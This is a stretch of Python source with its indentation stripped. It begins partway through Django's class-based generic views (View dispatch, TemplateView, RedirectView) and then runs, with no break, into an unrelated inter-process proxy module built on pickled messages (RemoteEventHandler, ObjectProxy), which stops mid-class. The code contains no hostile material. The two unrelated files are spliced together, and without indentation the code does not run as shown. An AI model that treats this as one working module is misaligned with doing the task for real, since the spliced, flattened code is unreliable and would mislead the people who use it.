if key in cls.http_method_names:
raise TypeError("You tried to pass in the %s method name as a "
"keyword argument to %s(). Don't do that."
% (key, cls.__name__))
if not hasattr(cls, key):
raise TypeError("%s() received an invalid keyword %r. as_view "
"only accepts arguments that are already "
"attributes of the class." % (cls.__name__, key))
def view(request, *args, **kwargs):
self = cls(**initkwargs)
if hasattr(self, 'get') and not hasattr(self, 'head'):
self.head = self.get
self.request = request
self.args = args
self.kwargs = kwargs
return self.dispatch(request, *args, **kwargs)
# take name and docstring from class
update_wrapper(view, cls, updated=())
# and possible attributes set by decorators
# like csrf_exempt from dispatch
update_wrapper(view, cls.dispatch, assigned=())
return view
def dispatch(self, request, *args, **kwargs):
# Try to dispatch to the right method; if a method doesn't exist,
# defer to the error handler. Also defer to the error handler if the
# request method isn't on the approved list.
if request.method.lower() in self.http_method_names:
handler = getattr(self, request.method.lower(), self.http_method_not_allowed)
else:
handler = self.http_method_not_allowed
return handler(request, *args, **kwargs)
def http_method_not_allowed(self, request, *args, **kwargs):
logger.warning('Method Not Allowed (%s): %s', request.method, request.path,
extra={
'status_code': 405,
'request': self.request
}
)
return http.HttpResponseNotAllowed(self._allowed_methods())
def options(self, request, *args, **kwargs):
"""
Handles responding to requests for the OPTIONS HTTP verb.
"""
response = http.HttpResponse()
response['Allow'] = ', '.join(self._allowed_methods())
response['Content-Length'] = '0'
return response
def _allowed_methods(self):
return [m.upper() for m in self.http_method_names if hasattr(self, m)]
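# Minimal usage sketch (hypothetical PingView): subclass View and define
# methods named after HTTP verbs; as_view() builds the URLconf callable and
# dispatch() routes on request.method.
#
#   class PingView(View):
#       def get(self, request, *args, **kwargs):
#           return http.HttpResponse('pong')
#
#   # urls.py: url(r'^ping/$', PingView.as_view())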
class TemplateResponseMixin(object):
"""
A mixin that can be used to render a template.
"""
template_name = None
response_class = TemplateResponse
content_type = None
def render_to_response(self, context, **response_kwargs):
"""
Returns a response, using the `response_class` for this
view, with a template rendered with the given context.
If any keyword arguments are provided, they will be
passed to the constructor of the response class.
"""
response_kwargs.setdefault('content_type', self.content_type)
return self.response_class(
request=self.request,
template=self.get_template_names(),
context=context,
**response_kwargs
)
def get_template_names(self):
"""
Returns a list of template names to be used for the request. Must return
a list. May not be called if render_to_response is overridden.
"""
if self.template_name is None:
raise ImproperlyConfigured(
"TemplateResponseMixin requires either a definition of "
"'template_name' or an implementation of 'get_template_names()'")
else:
return [self.template_name]
class TemplateView(TemplateResponseMixin, ContextMixin, View):
"""
A view that renders a template. This view will also pass into the context
any keyword arguments passed by the url conf.
"""
def get(self, request, *args, **kwargs):
context = self.get_context_data(**kwargs)
return self.render_to_response(context)
class RedirectView(View):
"""
A view that provides a redirect on any GET request.
"""
permanent = True
url = None
pattern_name = None
query_string = False
def get_redirect_url(self, *args, **kwargs):
"""
Return the URL redirect to. Keyword arguments from the
URL pattern match generating the redirect request
are provided as kwargs to this method.
"""
if self.url:
url = self.url % kwargs
elif self.pattern_name:
try:
url = reverse(self.pattern_name, args=args, kwargs=kwargs)
except NoReverseMatch:
return None
else:
return None
args = self.request.META.get('QUERY_STRING', '')
if args and self.query_string:
url = "%s?%s" % (url, args)
return url
def get(self, request, *args, **kwargs):
url = self.get_redirect_url(*args, **kwargs)
if url:
if self.permanent:
return http.HttpResponsePermanentRedirect(url)
else:
return http.HttpResponseRedirect(url)
else:
logger.warning('Gone: %s', self.request.path,
extra={
'status_code': 410,
'request': self.request
})
return http.HttpResponseGone()
def head(self, request, *args, **kwargs):
return self.get(request, *args, **kwargs)
def post(self, request, *args, **kwargs):
return self.get(request, *args, **kwargs)
def options(self, request, *args, **kwargs):
return self.get(request, *args, **kwargs)
def delete(self, request, *args, **kwargs):
return self.get(request, *args, **kwargs)
def put(self, request, *args, **kwargs):
return self.get(request, *args, **kwargs)
def patch(self, request, *args, **kwargs):
return self.get(request, *args, **kwargs)
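# Usage sketch (hypothetical URLconf): TemplateView needs either template_name
# or an overridden get_template_names(); RedirectView resolves pattern_name
# via reverse() at request time and answers 410 Gone when no URL results.
#
#   from django.conf.urls import url
#
#   urlpatterns = [
#       url(r'^about/$', TemplateView.as_view(template_name='about.html'),
#           name='about'),
#       url(r'^old-about/$', RedirectView.as_view(pattern_name='about')),
#   ]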
import os, time, sys, traceback, weakref
import numpy as np
import threading
try:
import __builtin__ as builtins
import cPickle as pickle
except ImportError:
import builtins
import pickle
# color printing for debugging
from ..util import cprint
class ClosedError(Exception):
"""Raised when an event handler receives a request to close the connection
or discovers that the connection has been closed."""
pass
class NoResultError(Exception):
"""Raised when a request for the return value of a remote call fails
because the call has not yet returned."""
pass
class RemoteEventHandler(object):
"""
This class handles communication between two processes. One instance is present on
each process and listens for communication from the other process. This enables
(amongst other things) ObjectProxy instances to look up their attributes and call
their methods.
This class is responsible for carrying out actions on behalf of the remote process.
Each instance holds one end of a Connection which allows python
objects to be passed between processes.
For the most common operations, see _import(), close(), and transfer()
To handle and respond to incoming requests, RemoteEventHandler requires that its
processRequests method is called repeatedly (this is usually handled by the Process
classes defined in multiprocess.processes).
"""
handlers = {} ## maps {process ID : handler}. This allows unpickler to determine which process
## an object proxy belongs to
def __init__(self, connection, name, pid, debug=False):
self.debug = debug
self.conn = connection
self.name = name
self.results = {} ## reqId: (status, result); cache of request results received from the remote process
## status is either 'result' or 'error'
## if 'error', then result will be (exception, formatted exception)
## where exception may be None if it could not be passed through the Connection.
self.resultLock = threading.RLock()
self.proxies = {} ## maps {weakref(proxy): proxyId}; used to inform the remote process when a proxy has been deleted.
self.proxyLock = threading.RLock()
## attributes that affect the behavior of the proxy.
## See ObjectProxy._setProxyOptions for description
self.proxyOptions = {
'callSync': 'sync', ## 'sync', 'async', 'off'
'timeout': 10, ## float
'returnType': 'auto', ## 'proxy', 'value', 'auto'
'autoProxy': False, ## bool
'deferGetattr': False, ## True, False
'noProxyTypes': [ type(None), str, int, float, tuple, list, dict, LocalObjectProxy, ObjectProxy ],
}
if int(sys.version[0]) < 3:
self.proxyOptions['noProxyTypes'].append(unicode)
else:
self.proxyOptions['noProxyTypes'].append(bytes)
self.optsLock = threading.RLock()
self.nextRequestId = 0
self.exited = False
# Mutexes to help prevent issues when multiple threads access the same RemoteEventHandler
self.processLock = threading.RLock()
self.sendLock = threading.RLock()
RemoteEventHandler.handlers[pid] = self ## register this handler as the one communicating with pid
@classmethod
def getHandler(cls, pid):
try:
return cls.handlers[pid]
except:
print(pid, cls.handlers)
raise
def debugMsg(self, msg, *args):
if not self.debug:
return
cprint.cout(self.debug, "[%d] %s\n" % (os.getpid(), str(msg)%args), -1)
def getProxyOption(self, opt):
with self.optsLock:
return self.proxyOptions[opt]
def setProxyOptions(self, **kwds):
"""
Set the default behavior options for object proxies.
See ObjectProxy._setProxyOptions for more info.
"""
with self.optsLock:
self.proxyOptions.update(kwds)
def processRequests(self):
"""Process all pending requests from the pipe, return
after no more events are immediately available. (non-blocking)
Returns the number of events processed.
"""
with self.processLock:
if self.exited:
self.debugMsg(' processRequests: exited already; raise ClosedError.')
raise ClosedError()
numProcessed = 0
while self.conn.poll():
#try:
#poll = self.conn.poll()
#if not poll:
#break
#except IOError: # this can happen if the remote process dies.
## might it also happen in other circumstances?
#raise ClosedError()
try:
self.handleRequest()
numProcessed += 1
except ClosedError:
self.debugMsg('processRequests: got ClosedError from handleRequest; setting exited=True.')
self.exited = True
raise
#except IOError as err: ## let handleRequest take care of this.
#self.debugMsg(' got IOError from handleRequest; try again.')
#if err.errno == 4: ## interrupted system call; try again
#continue
#else:
#raise
except:
print("Error in process %s" % self.name)
sys.excepthook(*sys.exc_info())
if numProcessed > 0:
self.debugMsg('processRequests: finished %d requests', numProcessed)
return numProcessed
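# Typically processRequests() is polled by the owning Process event loop (see
# multiprocess.processes); it returns 0 quickly when the pipe is empty.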
def handleRequest(self):
"""Handle a single request from the remote process.
Blocks until a request is available."""
result = None
while True:
try:
## args, kwds are double-pickled to ensure this recv() call never fails
cmd, reqId, nByteMsgs, optStr = self.conn.recv()
break
except EOFError:
self.debugMsg(' handleRequest: got EOFError from recv; raise ClosedError.')
## remote process has shut down; end event loop
raise ClosedError()
except IOError as err:
if err.errno == 4: ## interrupted system call; try again
self.debugMsg(' handleRequest: got IOError 4 from recv; try again.')
continue
else:
self.debugMsg(' handleRequest: got IOError %d from recv (%s); raise ClosedError.', err.errno, err.strerror)
raise ClosedError()
self.debugMsg(" handleRequest: received %s %s", cmd, reqId)
## read byte messages following the main request
byteData = []
if nByteMsgs > 0:
self.debugMsg(" handleRequest: reading %d byte messages", nByteMsgs)
for i in range(nByteMsgs):
while True:
try:
byteData.append(self.conn.recv_bytes())
break
except EOFError:
self.debugMsg(" handleRequest: got EOF while reading byte messages; raise ClosedError.")
raise ClosedError()
except IOError as err:
if err.errno == 4:
self.debugMsg(" handleRequest: got IOError 4 while reading byte messages; try again.")
continue
else:
self.debugMsg(" handleRequest: got IOError while reading byte messages; raise ClosedError.")
raise ClosedError()
try:
if cmd == 'result' or cmd == 'error':
resultId = reqId
reqId = None ## prevents attempt to return information from this request
## (this is already a return from a previous request)
opts = pickle.loads(optStr)
self.debugMsg(" handleRequest: id=%s opts=%s", reqId, opts)
#print os.getpid(), "received request:", cmd, reqId, opts
returnType = opts.get('returnType', 'auto')
if cmd == 'result':
with self.resultLock:
self.results[resultId] = ('result', opts['result'])
elif cmd == 'error':
with self.resultLock:
self.results[resultId] = ('error', (opts['exception'], opts['excString']))
elif cmd == 'getObjAttr':
result = getattr(opts['obj'], opts['attr'])
elif cmd == 'callObj':
obj = opts['obj']
fnargs = opts['args']
fnkwds = opts['kwds']
## If arrays were sent as byte messages, they must be re-inserted into the
## arguments
if len(byteData) > 0:
for i,arg in enumerate(fnargs):
if isinstance(arg, tuple) and len(arg) > 0 and arg[0] == '__byte_message__':
ind = arg[1]
dtype, shape = arg[2]
fnargs[i] = np.fromstring(byteData[ind], dtype=dtype).reshape(shape)
for k,arg in fnkwds.items():
if isinstance(arg, tuple) and len(arg) > 0 and arg[0] == '__byte_message__':
ind = arg[1]
dtype, shape = arg[2]
fnkwds[k] = np.fromstring(byteData[ind], dtype=dtype).reshape(shape)
if len(fnkwds) == 0: ## need to do this because some functions do not allow keyword arguments.
try:
result = obj(*fnargs)
except:
print("Failed to call object %s: %d, %s" % (obj, len(fnargs), fnargs[1:]))
raise
else:
result = obj(*fnargs, **fnkwds)
elif cmd == 'getObjValue':
result = opts['obj'] ## has already been unpickled into its local value
returnType = 'value'
elif cmd == 'transfer':
result = opts['obj']
returnType = 'proxy'
elif cmd == 'transferArray':
## read array data from next message:
result = np.fromstring(byteData[0], dtype=opts['dtype']).reshape(opts['shape'])
returnType = 'proxy'
elif cmd == 'import':
name = opts['module']
fromlist = opts.get('fromlist', [])
mod = builtins.__import__(name, fromlist=fromlist)
if len(fromlist) == 0:
parts = name.lstrip('.').split('.')
result = mod
for part in parts[1:]:
result = getattr(result, part)
else:
## use getattr() (module objects lack __getattr__) and build a real list so it pickles
result = [getattr(mod, name) for name in fromlist]
elif cmd == 'del':
LocalObjectProxy.releaseProxyId(opts['proxyId'])
#del self.proxiedObjects[opts['objId']]
elif cmd == 'close':
if reqId is not None:
result = True
returnType = 'value'
exc = None
except:
exc = sys.exc_info()
if reqId is not None:
if exc is None:
self.debugMsg(" handleRequest: sending return value for %d: %s", reqId, result)
#print "returnValue:", returnValue, result
if returnType == 'auto':
with self.optsLock:
noProxyTypes = self.proxyOptions['noProxyTypes']
result = self.autoProxy(result, noProxyTypes)
elif returnType == 'proxy':
result = LocalObjectProxy(result)
try:
self.replyResult(reqId, result)
except:
sys.excepthook(*sys.exc_info())
self.replyError(reqId, *sys.exc_info())
else:
self.debugMsg(" handleRequest: returning exception for %d", reqId)
self.replyError(reqId, *exc)
elif exc is not None:
sys.excepthook(*exc)
if cmd == 'close':
if opts.get('noCleanup', False) is True:
os._exit(0) ## exit immediately, do not pass GO, do not collect $200.
## (more importantly, do not call any code that would
## normally be invoked at exit)
else:
raise ClosedError()
def replyResult(self, reqId, result):
self.send(request='result', reqId=reqId, callSync='off', opts=dict(result=result))
def replyError(self, reqId, *exc):
print("error: %s %s %s" % (self.name, str(reqId), str(exc[1])))
excStr = traceback.format_exception(*exc)
try:
self.send(request='error', reqId=reqId, callSync='off', opts=dict(exception=exc[1], excString=excStr))
except:
self.send(request='error', reqId=reqId, callSync='off', opts=dict(exception=None, excString=excStr))
def send(self, request, opts=None, reqId=None, callSync='sync', timeout=10, returnType=None, byteData=None, **kwds):
"""Send a request or return packet to the remote process.
Generally it is not necessary to call this method directly; it is for internal use.
(The docstring has information that is nevertheless useful to the programmer
as it describes the internal protocol used to communicate between processes)
============== ====================================================================
**Arguments:**
request String describing the type of request being sent (see below)
reqId Integer uniquely linking a result back to the request that generated
it. (most requests leave this blank)
callSync 'sync': return the actual result of the request
'async': return a Request object which can be used to look up the
result later
'off': return no result
timeout Time in seconds to wait for a response when callSync=='sync'
opts Extra arguments sent to the remote process that determine the way
the request will be handled (see below)
returnType 'proxy', 'value', or 'auto'
byteData If specified, this is a list of objects to be sent as byte messages
to the remote process.
This is used to send large arrays without the cost of pickling.
============== ====================================================================
Description of request strings and options allowed for each:
============= ============= ========================================================
request option description
------------- ------------- --------------------------------------------------------
getObjAttr Request the remote process return (proxy to) an
attribute of an object.
obj reference to object whose attribute should be
returned
attr string name of attribute to return
returnValue bool or 'auto' indicating whether to return a proxy or
the actual value.
callObj Request the remote process call a function or
method. If a request ID is given, then the call's
return value will be sent back (or information
about the error that occurred while running the
function)
obj the (reference to) object to call
args tuple of arguments to pass to callable
kwds dict of keyword arguments to pass to callable
returnValue bool or 'auto' indicating whether to return a proxy or
the actual value.
getObjValue Request the remote process return the value of
a proxied object (must be picklable)
obj reference to object whose value should be returned
transfer Copy an object to the remote process and request
it return a proxy for the new object.
obj The object to transfer.
import Request the remote process import new symbols
and return proxy(ies) to the imported objects
module the string name of the module to import
fromlist optional list of string names to import from module
del Inform the remote process that a proxy has been
released (thus the remote process may be able to
release the original object)
proxyId id of proxy which is no longer referenced by
remote host
close Instruct the remote process to stop its event loop
and exit. Optionally, this request may return a
confirmation.
result Inform the remote process that its request has
been processed
result return value of a request
error Inform the remote process that its request failed
exception the Exception that was raised (or None if the
exception could not be pickled)
excString string-formatted version of the exception and
traceback
============= ============= ========================================================
"""
if self.exited:
self.debugMsg(' send: exited already; raise ClosedError.')
raise ClosedError()
with self.sendLock:
#if len(kwds) > 0:
#print "Warning: send() ignored args:", kwds
if opts is None:
opts = {}
assert callSync in ['off', 'sync', 'async'], 'callSync must be one of "off", "sync", or "async" (got %r)' % callSync
if reqId is None:
if callSync != 'off': ## requested return value; use the next available request ID
reqId = self.nextRequestId
self.nextRequestId += 1
else:
## If requestId is provided, this _must_ be a response to a previously received request.
assert request in ['result', 'error']
if returnType is not None:
opts['returnType'] = returnType
#print os.getpid(), "send request:", request, reqId, opts
## double-pickle args to ensure that at least status and request ID get through
try:
optStr = pickle.dumps(opts)
except:
print("==== Error pickling this object: ====")
print(opts)
print("=======================================")
raise
nByteMsgs = 0
if byteData is not None:
nByteMsgs = len(byteData)
## Send primary request
request = (request, reqId, nByteMsgs, optStr)
self.debugMsg('send request: cmd=%s nByteMsgs=%d id=%s opts=%s', request[0], nByteMsgs, reqId, opts)
self.conn.send(request)
## follow up by sending byte messages
if byteData is not None:
for obj in byteData: ## Remote process _must_ be prepared to read the same number of byte messages!
self.conn.send_bytes(obj)
self.debugMsg(' sent %d byte messages', len(byteData))
self.debugMsg(' call sync: %s', callSync)
if callSync == 'off':
return
req = Request(self, reqId, description=str(request), timeout=timeout)
if callSync == 'async':
return req
if callSync == 'sync':
return req.result()
def close(self, callSync='off', noCleanup=False, **kwds):
try:
self.send(request='close', opts=dict(noCleanup=noCleanup), callSync=callSync, **kwds)
self.exited = True
except ClosedError:
pass
def getResult(self, reqId):
## raises NoResultError if the result is not available yet
#print self.results.keys(), os.getpid()
with self.resultLock:
haveResult = reqId in self.results
if not haveResult:
try:
self.processRequests()
except ClosedError: ## even if remote connection has closed, we may have
## received new data during this call to processRequests()
pass
with self.resultLock:
if reqId not in self.results:
raise NoResultError()
status, result = self.results.pop(reqId)
if status == 'result':
return result
elif status == 'error':
#print ''.join(result)
exc, excStr = result
if exc is not None:
print("===== Remote process raised exception on request: =====")
print(''.join(excStr))
print("===== Local Traceback to request follows: =====")
raise exc
else:
print(''.join(excStr))
raise Exception("Error getting result. See above for exception from remote process.")
else:
raise Exception("Internal error.")
def _import(self, mod, **kwds):
"""
Request the remote process import a module (or symbols from a module)
and return the proxied results. Uses built-in __import__() function, but
adds a bit more processing:
_import('module') => returns module
_import('module.submodule') => returns submodule
(note this differs from behavior of __import__)
_import('module', fromlist=[name1, name2, ...]) => returns [module.name1, module.name2, ...]
(this also differs from behavior of __import__)
"""
return self.send(request='import', callSync='sync', opts=dict(module=mod), **kwds)
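# e.g. (sketch): rnp = proc._import('numpy') returns an ObjectProxy for the
# remote numpy module; rnp.array([1, 2, 3]) then executes remotely.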
def getObjAttr(self, obj, attr, **kwds):
return self.send(request='getObjAttr', opts=dict(obj=obj, attr=attr), **kwds)
def getObjValue(self, obj, **kwds):
return self.send(request='getObjValue', opts=dict(obj=obj), **kwds)
def callObj(self, obj, args, kwds, **opts):
opts = opts.copy()
args = list(args)
## Decide whether to send arguments by value or by proxy
with self.optsLock:
noProxyTypes = opts.pop('noProxyTypes', None)
if noProxyTypes is None:
noProxyTypes = self.proxyOptions['noProxyTypes']
autoProxy = opts.pop('autoProxy', self.proxyOptions['autoProxy'])
if autoProxy is True:
args = [self.autoProxy(v, noProxyTypes) for v in args]
for k, v in kwds.items():
opts[k] = self.autoProxy(v, noProxyTypes)
byteMsgs = []
## If there are arrays in the arguments, send those as byte messages.
## We do this because pickling arrays is too expensive.
for i,arg in enumerate(args):
if arg.__class__ == np.ndarray:
args[i] = ("__byte_message__", len(byteMsgs), (arg.dtype, arg.shape))
byteMsgs.append(arg)
for k,v in kwds.items():
if v.__class__ == np.ndarray:
kwds[k] = ("__byte_message__", len(byteMsgs), (v.dtype, v.shape))
byteMsgs.append(v)
return self.send(request='callObj', opts=dict(obj=obj, args=args, kwds=kwds), byteData=byteMsgs, **opts)
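# Note: ndarray arguments are replaced above by ('__byte_message__', index,
# (dtype, shape)) placeholders and streamed with conn.send_bytes(); the remote
# handleRequest() reassembles them before making the call.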
def registerProxy(self, proxy):
with self.proxyLock:
ref = weakref.ref(proxy, self.deleteProxy)
self.proxies[ref] = proxy._proxyId
def deleteProxy(self, ref):
if self.send is None:
# this can happen during shutdown
return
with self.proxyLock:
proxyId = self.proxies.pop(ref)
try:
self.send(request='del', opts=dict(proxyId=proxyId), callSync='off')
except ClosedError: ## if remote process has closed down, there is no need to send delete requests anymore
pass
def transfer(self, obj, **kwds):
"""
Transfer an object by value to the remote host (the object must be picklable)
and return a proxy for the new remote object.
"""
if obj.__class__ is np.ndarray:
opts = {'dtype': obj.dtype, 'shape': obj.shape}
return self.send(request='transferArray', opts=opts, byteData=[obj], **kwds)
else:
return self.send(request='transfer', opts=dict(obj=obj), **kwds)
def autoProxy(self, obj, noProxyTypes):
## Return object wrapped in LocalObjectProxy _unless_ its type is in noProxyTypes.
for typ in noProxyTypes:
if isinstance(obj, typ):
return obj
return LocalObjectProxy(obj)
class Request(object):
"""
Request objects are returned when calling an ObjectProxy in asynchronous mode
or if a synchronous call has timed out. Use hasResult() to ask whether
the result of the call has been returned yet. Use result() to get
the returned value.
"""
def __init__(self, process, reqId, description=None, timeout=10):
self.proc = process
self.description = description
self.reqId = reqId
self.gotResult = False
self._result = None
self.timeout = timeout
def result(self, block=True, timeout=None):
"""
Return the result for this request.
If block is True, wait until the result has arrived or *timeout* seconds passes.
If the timeout is reached, raise NoResultError. (use timeout=None to disable)
If block is False, raise NoResultError immediately if the result has not arrived yet.
If the process's connection has closed before the result arrives, raise ClosedError.
"""
if self.gotResult:
return self._result
if timeout is None:
timeout = self.timeout
if block:
start = time.time()
while not self.hasResult():
if self.proc.exited:
raise ClosedError()
time.sleep(0.005)
if timeout >= 0 and time.time() - start > timeout:
print("Request timed out: %s" % self.description)
import traceback
traceback.print_stack()
raise NoResultError()
return self._result
else:
self._result = self.proc.getResult(self.reqId) ## raises NoResultError if result is not available yet
self.gotResult = True
return self._result
def hasResult(self):
"""Returns True if the result for this request has arrived."""
try:
self.result(block=False)
except NoResultError:
pass
return self.gotResult
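# Usage sketch (assumes ``ros`` is an ObjectProxy for a remote os module):
#
#   req = ros.getpid(_callSync='async')   # returns a Request immediately
#   while not req.hasResult():
#       time.sleep(0.01)
#   pid = req.result()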
class LocalObjectProxy(object):
"""
Used for wrapping local objects to ensure that they are sent by proxy to a remote host.
Note that 'proxy' is just a shorter alias for LocalObjectProxy.
For example::
data = [1,2,3,4,5]
remotePlot.plot(data) ## by default, lists are pickled and sent by value
remotePlot.plot(proxy(data)) ## force the object to be sent by proxy
"""
nextProxyId = 0
proxiedObjects = {} ## maps {proxyId: object}
@classmethod
def registerObject(cls, obj):
## assign it a unique ID so we can keep a reference to the local object
pid = cls.nextProxyId
cls.nextProxyId += 1
cls.proxiedObjects[pid] = obj
#print "register:", cls.proxiedObjects
return pid
@classmethod
def lookupProxyId(cls, pid):
return cls.proxiedObjects[pid]
@classmethod
def releaseProxyId(cls, pid):
del cls.proxiedObjects[pid]
#print "release:", cls.proxiedObjects
def __init__(self, obj, **opts):
"""
Create a 'local' proxy object that, when sent to a remote host,
will appear as a normal ObjectProxy for *obj*.
Any extra keyword arguments are passed to proxy._setProxyOptions()
on the remote side.
"""
self.processId = os.getpid()
#self.objectId = id(obj)
self.typeStr = repr(obj)
#self.handler = handler
self.obj = obj
self.opts = opts
def __reduce__(self):
## a proxy is being pickled and sent to a remote process.
## every time this happens, a new proxy will be generated in the remote process,
## so we register a new ID each time so we can track when each one is released.
pid = LocalObjectProxy.registerObject(self.obj)
return (unpickleObjectProxy, (self.processId, pid, self.typeStr, None, self.opts))
## alias
proxy = LocalObjectProxy
def unpickleObjectProxy(processId, proxyId, typeStr, attributes=None, opts=None):
if processId == os.getpid():
obj = LocalObjectProxy.lookupProxyId(proxyId)
if attributes is not None:
for attr in attributes:
obj = getattr(obj, attr)
return obj
else:
proxy = ObjectProxy(processId, proxyId=proxyId, typeStr=typeStr)
if opts is not None:
proxy._setProxyOptions(**opts)
return proxy
class ObjectProxy(object):
"""
Proxy to an object stored by the remote process. Proxies are created
by calling Process._import(), Process.transfer(), or by requesting/calling
attributes on existing proxy objects.
For the most part, this object can be used exactly as if it
were a local object::
rsys = proc._import('sys') # returns proxy to sys module on remote process
rsys.stdout # proxy to remote sys.stdout
rsys.stdout.write # proxy to remote sys.stdout.write
rsys.stdout.write('hello') # calls sys.stdout.write('hello') on remote machine
# and returns the result (None)
When calling a proxy to a remote function, the call can be made synchronous
(result of call is returned immediately), asynchronous (result is returned later),
or return can be disabled entirely::
ros = proc._import('os')
## synchronous call; result is returned immediately
pid = ros.getpid()
## asynchronous call
request = ros.getpid(_callSync='async')
while not request.hasResult():
time.sleep(0.01)
pid = request.result()
## disable return when we know it isn't needed
rsys.stdout.write('hello', _callSync='off')
Additionally, values returned from a remote function call are automatically
returned either by value (must be picklable) or by proxy.
This behavior can be forced::
rnp = proc._import('numpy')
arrProxy = rnp.array([1,2,3,4], _returnType='proxy')
arrValue = rnp.array([1,2,3,4], _returnType='value')
The default callSync and returnType behaviors (as well as others) can be set
for each proxy individually using ObjectProxy._setProxyOptions() or globally using
proc.setProxyOptions().
"""
def __init__(self, processId, proxyId, typeStr='', parent=None):
object.__init__(self)
## can't set attributes directly because setattr is overridden.
self.__dict__['_processId'] = processId
self.__dict__['_typeStr'] = typeStr
self.__dict__['_proxyId'] = proxyId
self.__dict__['_attributes'] = ()
## attributes that affect the behavior of the proxy.
## in all cases, a value of None causes the proxy to ask
## its parent event handler to make the decision
self.__dict__['_proxyOptions'] = {
'callSync': None, ## 'sync', 'async', None
'timeout': None, ## float, None
'returnType': None, ## 'proxy', 'value', 'auto', None
'deferGetattr': None, ## True, False, None
'noProxyTypes': None, ## list of types to send by value instead of by proxy
'autoProxy': None,
}
self.__dict__['_handler'] = RemoteEventHandler.getHandler(processId)
self.__dict__['_handler'].registerProxy(self) ## handler will watch proxy; inform remote process when the proxy is deleted.
def _setProxyOptions(self, **kwds):
"""
Change the behavior of this proxy. For all options, a value of None
will cause the proxy to instead use the default behavior defined
by its parent Process.
Options are:
============= =============================================================
callSync 'sync', 'async', 'off', or None.
If 'async', then calling methods will return a Request object
which can be used to inquire later about the result of the
method call.
If 'sync', then calling a method
will block until the remote process has returned its result
or the timeout has elapsed (in this case, a Request object
is returned instead).
If 'off', then the remote process is instructed _not_ to
reply and the method call will return None immediately.
returnType 'auto', 'proxy', 'value', or None.
If 'proxy', then the value returned when calling a method
will be a proxy to the object on the remote process.
If 'value', then attempt to pickle the returned object and
send it back.
If 'auto', then the decision is made by consulting the
'noProxyTypes' option.
autoProxy bool or None. If True, arguments to __call__ are
automatically converted to proxy unless their type is
listed in noProxyTypes (see below). If False, arguments
are left untouched. Use proxy(obj) to manually convert
arguments before sending.
timeout float or None. Length of time to wait during synchronous
requests before returning a Request object instead.
deferGetattr True, False, or None.
If False, all attribute requests will be sent to the remote
process immediately and will block until a response is
received (or timeout has elapsed).
If True, requesting an attribute from the proxy returns a
new proxy immediately. The remote process is _not_ contacted
to make this request. This is faster, but it is possible to
request an attribute that does not exist on the proxied
object. In this case, AttributeError will not be raised
until an attempt is made to look up the attribute on the
remote process.
noProxyTypes List of object types that should _not_ be proxied when
sent to the remote process.
============= =============================================================
"""
for k in kwds:
if k not in self._proxyOptions:
raise KeyError("Unrecognized proxy option '%s'" % k)
self._proxyOptions.update(kwds)
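# e.g. (sketch): proxy._setProxyOptions(callSync='async', timeout=2) makes
# subsequent calls on this proxy asynchronous by default.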
def _getValue(self):
"""
Return the value of the proxied object
(the remote object must be picklable)
"""
return self._handler.getObjValue(self)
def _getProxyOption(self, opt):
val = self._proxyOptions[opt]
if val is None:
return self._handler.getProxyOption(opt)
return val
def _getProxyOptions(self):
return dict([(k, self._getProxyOption(k)) for k in self._proxyOptions])
def __reduce__(self):
return (unpickleObjectProxy, (self._processId, self._proxyId, self._typeStr, self._attributes))
def __repr__(self):
#objRepr = self.__getattr__('__repr__')(callSync='value')
return "<ObjectProxy for process %d, object 0x%x: %s >" % (self._processId, self._proxyId, self._typeStr)
def __getattr__(self, attr, **kwds):
"""
Calls __getattr__ on the remote object and returns the attribute
by value or by proxy depending on the options set (see
ObjectProxy._setProxyOptions and RemoteEventHandler.setProxyOptions)
If the option 'deferGetattr' is True for this proxy, then a new proxy object
is returned _without_ asking the remote object whether the named attribute exists.
        This can save time when making multiple chained attribute requests,
        but may also defer a possible AttributeError until later, making
        it more difficult to debug.
"""
opts = self._getProxyOptions()
for k in opts:
if '_'+k in kwds:
opts[k] = kwds.pop('_'+k)
if opts['deferGetattr'] is True:
return self._deferredAttr(attr)
else:
#opts = self._getProxyOptions()
return self._handler.getObjAttr(self, attr, **opts)
def _deferredAttr(self, attr):
return DeferredObjectProxy(self, attr)
def __call__(self, *args, **kwds):
"""
Attempts to call the proxied object from the remote process.
Accepts extra keyword arguments:
_callSync 'off', 'sync', or 'async'
_returnType 'value', 'proxy', or 'auto'
If the remote call raises an exception on the remote process,
it will be re-raised on the local process.
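        Example sketch (`someMethod` is a hypothetical remote method)::
            result = proxy.someMethod(arg, _callSync='sync', _returnType='value')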
"""
opts = self._getProxyOptions()
for k in opts:
if '_'+k in kwds:
opts[k] = kwds.pop('_'+k)
return self._handler.callObj(obj=self, args=args, kwds=kwds, **opts)
## Explicitly proxy special methods. Is there a better way to do this??
def _getSpecialAttr(self, attr):
## this just gives us an easy way to change the behavior of the special methods
return self._deferredAttr(attr)
def __getitem__(self, *args):
return self._getSpecialAttr('__getitem__')(*args)
def __setitem__(self, *args):
return self._getSpecialAttr('__setitem__')(*args, _callSync='off')
def __setattr__(self, *args):
return self._getSpecialAttr('__setattr__')(*args, _callSync='off')
def __str__(self, *args):
return self._getSpecialAttr('__str__')(*args, _returnType='value')
def __len__(self, *args):
return self._getSpecialAttr('__len__')(*args)
def __add__(self, *args):
return self._getSpecialAttr('__add__')(*args)
def __sub__(self, *args):
return self._getSpecialAttr('__sub__')(*args)
def __div__(self, *args):
return self._getSpecialAttr('__div__')(*args)
def __truediv__(self, *args):
return self._getSpecialAttr('__truediv__')(*args)
def __floordiv__(self, *args):
return self._getSpecialAttr('__floordiv__')(*args)
def __mul__(self, *args):
return self._getSpecialAttr('__mul__')(*args)
def __pow__(self, *args):
return self._getSpecialAttr('__pow__')(*args)
def __iadd__(self, *args):
return self._getSpecialAttr('__iadd__')(*args, _callSync='off')
def __isub__(self, *args):
return self._getSpecialAttr('__isub__')(*args, _callSync='off')
def __idiv__(self, *args):
return self._getSpecialAttr('__idiv__')(*args, _callSync='off')
def __itruediv__(self, *args):
return self._getSpecialAttr('__itruediv__')(*args, _callSync='off')
def __ifloordiv__(self, *args):
return self._getSpecialAttr('__ifloordiv__')(*args, _callSync='off')
def __imul__(self, *args):
return self._getSpecialAttr('__imul__')(*args, _callSync='off')
def __ipow__(self, *args):
return self._getSpecialAttr('__ipow__')(*args, _callSync='off')
def __rshift__(self, *args):
return self._getSpecialAttr('__rshift__')(*args)
def __lshift__(self, *args):
return self._getSpecialAttr('__lshift__')(*args)
def __irshift__(self, *args):
return self._getSpecialAttr('__irshift__')(*args, _callSync='off')
def __ilshift__(self, *args):
return self._getSpecialAttr('__ilshift__')(*args, _callSync='off')
def __eq__(self, *args):
return self._getSpecialAttr('__eq__')(*args)
def __ne__(self, *args):
